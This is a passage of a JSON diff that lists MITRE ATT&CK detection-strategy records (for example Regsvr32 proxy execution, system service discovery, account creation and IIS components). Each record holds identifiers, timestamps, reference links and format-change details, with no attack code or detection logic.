+                    "id": "x-mitre-detection-strategy--0a931f22-4820-48aa-8051-056da15a6183",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0282",
+                            "external_id": "DET0282"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for System Binary Proxy Execution: Regsvr32",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--50658b7e-57c5-4e31-b156-1b294574a9f2"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9d3a5603-ae0e-41fe-b2f5-7f3e44c903d7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0565",
+                            "external_id": "DET0565"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for System Language Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b8685b0b-f96e-41a4-8e01-eec252756447",
+                        "x-mitre-analytic--c625c090-edcc-431a-a2fb-c31e4eb5f2cf",
+                        "x-mitre-analytic--ffc71b21-982b-4fc7-8276-bd679d67bc95"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9daf5067-79c3-477c-bf41-813aada4770d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0043",
+                            "external_id": "DET0043"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for System Location Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--cd4d2b49-6a27-41a7-ab20-d2a3791142bd",
+                        "x-mitre-analytic--d053d033-b587-4ed0-bdbc-0c6a9bdd7c82",
+                        "x-mitre-analytic--0521835b-bc02-41ed-8e6a-153e6422ee9c",
+                        "x-mitre-analytic--5b41efa6-7410-403b-ac07-89e262fa17ca"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ef1996dc-b6e9-4d8b-a216-77d14323b3e5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0421",
+                            "external_id": "DET0421"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for System Services Service Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--fedc5a7d-4ea9-4dd7-b2e0-3f10549d90db"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--38364d2d-7b25-4f75-9679-eca4dd18b213",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0279",
+                            "external_id": "DET0279"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for System Services across OS platforms.",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--667c21d2-2f92-42d6-aaea-b46974f63c8d",
+                        "x-mitre-analytic--65691cb3-a2b3-4c48-91d2-7088a047ebef",
+                        "x-mitre-analytic--63d21290-b858-4c4e-9447-31d623048048"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--77078baf-96f1-413a-bf5b-96b42486e26c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0265",
+                            "external_id": "DET0265"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for System Services: Launchctl",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0297fd45-97bc-4913-8d38-218eae431544"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8a9b730a-b290-40ce-b182-dbcb06fbad3d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0073",
+                            "external_id": "DET0073"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for System Services: Systemctl",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--756d5795-ef61-4115-80d2-f2e7440dff56"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--552bacaa-9df5-4c95-83de-a7d1948003b5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0583",
+                            "external_id": "DET0583"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1136 - Create Account across platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--33d574c3-8e9b-462d-b3d1-09e64c2fa8c7",
+                        "x-mitre-analytic--9d70d90c-f318-4318-a18d-e4775ffa229e",
+                        "x-mitre-analytic--ddaf8ed8-f6bd-4eac-911c-d9fd243e87e9",
+                        "x-mitre-analytic--7947aae5-fd76-403c-8c73-1300dff7d30f",
+                        "x-mitre-analytic--d715d148-4d2d-407c-bd83-c471a4163d4e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7ad75a00-94f0-4deb-8642-df227a2a8ac6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0319",
+                            "external_id": "DET0319"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1136.003 - Cloud Account Creation across IaaS, IdP, SaaS, Office",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--668f1c2b-1a5e-4269-92d9-f7126764dd4e",
+                        "x-mitre-analytic--4264c6fb-20b2-4792-8939-c7d8f204338a",
+                        "x-mitre-analytic--e619c27e-3d57-489c-8ce9-cbb5f0c195bd",
+                        "x-mitre-analytic--53872bd3-7e5e-4573-ae07-6304bf7e49af"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a51d4d34-78fc-49b7-9071-348905dd33c2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0475",
+                            "external_id": "DET0475"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1218.011 Rundll32 Abuse",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--2cb33f68-48f8-4ffe-86e1-bc857a300398"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1d738832-3de4-45f0-98e5-ac37642619e8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0042",
+                            "external_id": "DET0042"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1218.012 Verclsid Abuse",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e9f451b7-1b9e-420e-983a-3442547b7180"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7f5dde79-7872-48dd-8718-cd2e10d7cbfc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0046",
+                            "external_id": "DET0046"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1497 Virtualization/Sandbox Evasion",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--55808d73-7aa9-4f2c-8122-8e60bf14f4c6",
+                        "x-mitre-analytic--412b76ec-d44e-4064-9dc1-32cf793f0176",
+                        "x-mitre-analytic--b12639b9-5daa-46aa-a21f-521f6962f042"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--27b606f9-dde4-456c-8d90-51289313994f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0547",
+                            "external_id": "DET0547"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1505 - Server Software Component",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ea250997-091b-4c5e-8827-a41f03e34caf",
+                        "x-mitre-analytic--65f89c21-d42a-4028-9865-122ea1079a77",
+                        "x-mitre-analytic--d5af4c93-632c-41c3-a101-6e9e534d7d01",
+                        "x-mitre-analytic--55b8622a-795b-41d8-9b11-5576a0fb8f0f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--90ee8005-5476-422f-abe0-6c231f004cd6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0166",
+                            "external_id": "DET0166"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1505.002 - Transport Agent Abuse (Windows/Linux)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c94b2c2b-8885-4f5e-abec-e80ab0a24f21",
+                        "x-mitre-analytic--2c64ece9-c40f-4d1a-babf-106f587454d0"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--32af4177-8c33-43d8-8e2c-9e11ac6dd451",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0068",
+                            "external_id": "DET0068"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1505.004 - Malicious IIS Components",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--09ef4725-8e20-452d-b08c-f7db3cbee174"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d9073646-f875-4c38-9b37-e9ac11c40188",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0212",
+                            "external_id": "DET0212"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1505.005 \u2013 Terminal Services DLL Modification (Windows)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--01f18cc1-2948-4ea7-adaf-017da939b9ff"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c08df366-fa5a-4f34-a27e-b28e756f09f0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0334",
+                            "external_id": "DET0334"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1525 \u2013 Implant Internal Image",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--de0a1136-1476-4c28-bf49-004ac3ef97f7",
+                        "x-mitre-analytic--7845facb-50f2-4d32-ae00-6766b9410681"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--58bdb4c6-510b-4ffc-9703-852614116ac8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
